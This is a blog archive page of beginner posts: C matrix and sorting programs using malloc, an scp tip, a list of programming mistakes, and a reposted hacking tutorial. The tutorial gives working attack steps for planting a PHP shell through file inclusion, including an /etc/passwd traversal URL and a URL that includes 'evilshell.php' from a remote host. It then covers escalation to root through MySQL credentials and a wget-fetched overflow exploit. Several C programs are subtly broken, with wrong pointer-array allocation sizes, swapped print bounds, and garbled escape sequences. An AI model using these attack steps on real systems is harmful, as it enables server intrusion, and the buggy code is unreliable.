Showing posts with label beginner. Show all posts
Showing posts with label beginner. Show all posts

## Tuesday 22 January 2013

### Simple Sorting Algorithm Using DMA

This post provides the source code for simple and naive integer sorting algorithm by exploiting the dynamic memory allocation feature of C programming.

#include <stdio.h>
#include <stdlib.h>

int main()
{
int *arr, i, j, n;

printf("Enter the number of items: ");
scanf("%d", &n);

arr = malloc(n * sizeof(int));

for (i = 0; i < n; i++)
{
printf("Enter the %dth item: ", i + 1);
scanf("%d", &arr[i]);
}

for (i = 0; i < n - 1; i++)
{
for (j = 0; j < n - 1; j++)
{
int temp;

if (arr[j] > arr[j + 1])
{
temp = arr[j];
arr[j] = arr[j + 1];
arr[j + 1] = temp;
}

}
}

printf("The sorted array is:\n");

for (i = 0; i < n; i++)
{
printf("%d\n", arr[i]);
}
return 0;
}
samar@samar-Techgaun:~\$ gcc -Wall -o sort sort.c
samar@samar-Techgaun:~\$ ./sort
Enter the number of items: 5
Enter the 1th item: 2
Enter the 2th item: 4
Enter the 3th item: 1
Enter the 4th item: 92
Enter the 5th item: 45
The sorted array is:
1
2
4
45
92

### Matrix Multiplication Using DMA [C Source Code]

This post provides a source code for matrix multiplication by dynamically allocating memory for matrices to be multiplied and multiplication of those matrices.

#include <stdio.h>
#include <stdlib.h>

int main()
{
int **A, **B, **C, m, n, p, q, i, j, k;
printf("Enter the size of matrix A: ");
scanf("%d %d", &m, &n);

printf("Enter the size of matrix B: ");
scanf("%d %d", &p, &q);

if (n == p)
{
A = malloc(m * sizeof(int));
B = malloc(p * sizeof(int));
C = malloc(m * sizeof(int));

for (i = 0; i < m; i++)
{
A[i] = malloc(n * sizeof(int));
C[i] = malloc(q * sizeof(int));
}

for (i = 0; i < p; i++)
{
B[i] = malloc(q * sizeof(int));
}

printf("Enter the matrix A:\n\n");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &A[i][j]);
}
}

printf("Enter the matrix B:\n\n");
for (i = 0; i < p; i++)
{
for (j = 0; j < q; j++)
{
scanf("%d", &B[i][j]);
}
}

for (i = 0; i < m; i++)
{
for (j = 0; j < q; j++)
{
C[i][j] = 0;
for (k = 0; k < n; k++)
{
C[i][j] = C[i][j] + (A[i][k] * B[k][j]);
}
}
}

printf("Multiplication of given matrices is: \n\n");

for (i = 0; i < m; i++)
{
for (j = 0; j < q; j++)
{
printf("%d ", C[i][j]);
}
printf("\n");
}

for (i = 0; i < m; i++)
{
free(A[i]);
free(C[i]);
}
for (i = 0; i < p; i++)
{
free(B[i]);
}
free(A);
free(B);
free(C);
}
else
{
printf("Matrix multiplication is not possible for given size\n\n");
}
return 0;
}
samar@samar-Techgaun:~\$ gcc -Wall -o matrix_mul matrix_mul.c
samar@samar-Techgaun:~\$ ./matrix_mul
Enter the size of matrix A: 3 2
Enter the size of matrix B: 2 3
Enter the matrix A:

1 2
3 4
5 6
Enter the matrix B:

1 2 3
4 5 6
Multiplication of given matrices is:

9 12 15
19 26 33
29 40 51

## Thursday 17 January 2013

### Addition Of Two Matrices Using DMA [C Source Code]

Here is the source code in C that makes use of DMA function malloc() to dynamically allocate the memory for matrices and find their sum.
#include <stdio.h>
#include <stdlib.h>

int main()
{
int **A, **B, **C, m, n, p, q, i, j;
printf("Enter the size of matrix A: ");
scanf("%d %d", &m, &n);

printf("Enter the size of matrix B: ");
scanf("%d %d", &p, &q);

if (m == p && n == q)
{
A = malloc(m * sizeof(int));
B = malloc(m * sizeof(int));
C = malloc(m * sizeof(int));

for (i = 0; i < m; i++)
{
A[i] = malloc(n * sizeof(int));
B[i] = malloc(n * sizeof(int));
C[i] = malloc(n * sizeof(int));
}

printf("Enter the matrix A:\n\n");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &A[i][j]);
}
}

printf("Enter the matrix B:\n\n");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &B[i][j]);
}
}

for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
C[i][j] = A[i][j] + B[i][j];
}
}

printf("The addition of two matrices is: \n\n");

for (i = 0; i < n; i++)
{
for (j = 0; j < m; j++)
{
printf("%d ", C[i][j]);
}
printf("\n");
}

for (i = 0; i < m; i++)
{
free(A[i]);
free(B[i]);
free(C[i]);
}
free(A);
free(B);
free(C);
}
else
{
printf("Matrix addition is not possible for given size\n\n");
}

return 0;
}

Below is a sample run along with the compilation step.

Enter the size of matrix A: 2 2
Enter the size of matrix B: 2 2
Enter the matrix A:

1 2
3 4
Enter the matrix B:

4 3
2 1
The addition of two matrices is:

5 5
5 5

## Tuesday 15 January 2013

### Transpose Of Matrix Using DMA [C Source Code]

This snippet utilizes the dynamic memory allocation function, malloc() and finds the transpose of the user provided matrix.

Below is the source code:

#include <stdio.h>
#include <stdlib.h>

int main()
{
int **matrix, **transpose, m, n, i, j;
printf("Enter the size of matrix: ");
scanf("%d %d", &m, &n);

matrix = malloc(m * sizeof(int));
transpose = malloc(n * sizeof(int));

for (i = 0; i < m; i++)
{
matrix[i] = malloc(n * sizeof(int));
}

for (i = 0; i < n; i++)
{
transpose[i] = malloc(m * sizeof(int));
}

printf("Enter the matrix:nn");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &matrix[i][j]);
}
}

for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
transpose[j][i] = matrix[i][j];
}
}

printf("The transpose of given matrix is: nn");

for (i = 0; i < n; i++)
{
for (j = 0; j < m; j++)
{
printf("%d ", transpose[i][j]);
}
printf("n");
}

for (i = 0; i < m; i++)
{
free(matrix[i]);
}
for (i = 0; i < n; i++)
{
free(transpose[i]);
}
free(matrix);
free(transpose);
return 0;
}

Below is the sample run:

samar@Techgaun:~\$ gcc -Wall -o transpose transpose.c
samar@Techgaun:~\$ ./transpose
Enter the size of matrix: 2 3
Enter the matrix:

1 2 3
4 5 6
The transpose of given matrix is:

1 4
2 5
3 6

## Thursday 16 February 2012

### Art of hacking 4 - spyd3rm4n's guide to hacking

Well this is the part 4 of the art of hacking series I've been posting here. Since the original site dmz has been down since long time, I have been uploading these tutorials. This part of tutorial explains what a PHP shell is and how you can use the php shell to gain the root access in the servers.

[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root

Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}

Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.

The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.

You can use this as an LFI (Local File Inclusion) and RFI.

http://site.com/index.php?page=../../../../../etc/passwd

This will show the passwd on the linux box. Giving you directory listing for every user on it.

http://site.com/index.php?page=http://anothersite.com/evilshell.php

This will include the evilshell.php located at anothersite.com

Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like

include();
@include();

as long as the include() function includes user input, like

\$page = \$_GET['page'];

This is the GET method, \$page is assigned to the value of page. http://site.com/index.php?page=
@include(\$page);

^ Jackpot.

Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:

Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.

That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.

Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:

There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)

Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.

Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}

- Credits : Kr3w of TheDefaced.

## Tuesday 14 February 2012

### Hacking Step by Step For Beginners [Guest Post]

This article is an excellent step-by-btep tutorial for those who want to be hackers. Don't expect it to teach you step-wise process of hacking a website or an e-mail address. Instead, this tutorial is aimed to help you how you should proceed to really understand the computer systems so that you become a real computer hacker.

"How do you hack"? "I wanna to learn hacking". "How to get started"?
"How can I get the password"? "How do I crack "?

Does this sound like you? who needs to learn how to hack? And nobody
will even speak to you much less send you any info???

Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.

Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...

[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.

[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do

[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.

[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.

[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( à¤¯ा à¤¹ाà¤µा)! don't be
fooled by them coz real hacker will never use the worthless shit (à¤¹ाà¤µा) like JAVA.

[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.

[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!

[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.

[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
à¤¬à¤š्à¤šा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.

[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.

[11] Install non-childish(non-à¤¬à¤š्à¤šा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!

[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).

[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.

[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.

[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!

This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...

True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!

Reference and Copies:

17 Steps to Hack
Ubuntards
some cools stuff which i can't remember

The article was originally contributed by rhoit in the foss-nepal mailing list.

## Sunday 18 December 2011

### Copying Files From Remote Server Using SCP In Linux

Hi everybody, sometimes you need to copy files from remote server and only thing you have access to might be SSh. If you can access remote server via SSh, then you can copy files from the remote server using scp(secure file copy). This short tip will help you copy files from remote server using scp.

Scp is remote secure file copy program that makes use of SSh for the data transfer and uses the SSh authentication. The general syntax is as below:

scp -P ssh_port user@server:remote_file_path local_file_path

Following was the command I used to copy a file from remote server to my computer. It will then ask for the password for the corresponding user before you can copy the file.

Also, there are GUIs for this purpose as well such as WinSCP for windows and Krusader file manager and gftp for linux distros. GUI would make things easier but still I am used to with command lines and I hope you are as well.

I hope this helps. :)

Edit(Dec 19): Paths with whitespaces must be escaped with \ character. An example of this is as below:

## Tuesday 22 November 2011

### Common Programming Mistakes Beginner Programmers Do

The beginner programmers make some common mistakes which might be due to the lack of practice and deeper understanding of the language syntax and semantics. Here I am listing some of the common programming mistakes every programmer does when s/he is beginner or new to programming.

Mistake #1: Lack of code modularization
Many beginners just write everything within the main function and end up repeating many statements again and again. Rather than having everything within a single main function, you could separate the certain logic in a separate module known as function and then just call that function when needed. If you haven't heard about function, start with google and learn to write some. You'll not regret learning to make functions.

Mistake #2: Another common mistake is not indenting(Read the section Indentation in programming in wikipedia entry) your code and not writing the proper comments in the places wherever necessary. Lack of proper indentation and comments reduce readability. While many compilers and interpreters do not take care about the indentation and comments, human eyes find it easy to understand the properly indented and commented code. Also, some languages such as python rely on indentation where indentation is a must.

Mistake #3: Another common mistake is to use '=' instead of '=='. I've seen this mistake in a lot of codes done by my beginner friends usually in the conditional statements(such as if else) thus resulting in a completely wrong output many times. FYI, '=' is the assignment operator while '==' is the is equal to operator. Note that when '=' is used, the variable on left side of '=' gets set to the value of the expression on the rights. The assignment operator changes the variable on the left to have a new value, while the equal operator '==' tests for equality and returns true or false.

Mistake #4: Integer and float division is also another common mistake every beginner programmer happens to do. In the language like C, the division such as 5/10 will result in 0 since 5 and 10 both are integers and integer division is done. This might lead to mathematical errors in programming. So be sure to typecast the variables to the proper data type before performing division.

Mistake #5: Another common mistake is the use of uninitialized variables. Beginners forget to assign the values to the variables thus giving unexpected outputs such as garbage values in C. Some languages provide default values (such as 0 or null) for uninitialized variables but still using uninitialized variable is a mistake to avoid. Also, many forget to declare the variables thus producing compiler error.

Mistake #6: Another mistake is to compare the strings in C(strings in C are array of characters) using the is equal to '==' operator. Note that string comparison in C requires use of the library functions such as strcmp(), strcmpi() and their safe alternatives such as strncmp() and strncmpi(). Btw, do not use strcmp() and strcmpi() since they do not check length thus might lead to overflow.

Mistake #7: Using wrong range of array indices is also another common mistakes the beginners do. For example, an array of size 10 should be accessed using indices from 0 to 9, not from 1 to 10. Also, some other languages such as Matlab and Fortran, indices will go from 1 to 10. Just make sure you understand the specifications of the language you are learning.

Mistake #8: Using function calls within the looping condition is another mistake. Lets take an example of the following code snippet:

for (i = 0; i < strlen(str); i++) { //do something }

In each iteration, the strlen() function is being called which can slow down your program. So always avoid such calls within the looping conditions.

int len = strlen(str);
for (i = 0; i < len; i++) { //do something }

Mistake #9: Another mistake is the use of insecure and vulnerable functions. If you are going to use certain function, always make a deep study about it to know whether it is secure or not and if it is not secure, search for its secure alternative. Buffer overflows are one of the things you should always try to prevent. Also, if you are doing PHP or other web-based language, always use the safe functions to avoid common security issues such as SQL Injection, Cross Site Scripting, etc. Always research to write secure codes so that you can prevent hackers breaking your code.

Mistake #10: Finally, beginners tend to leave what they are doing if they can not locate errors and mistakes in their code. Just remember studying and practising is the only key to master any stuff which applies to programming as well. You've got such a big resource like internet, so make extensive use of it and never let you go down. Just read and practise and you'll eventually master yourself.

I hope this post helps beginner programmers out there. :)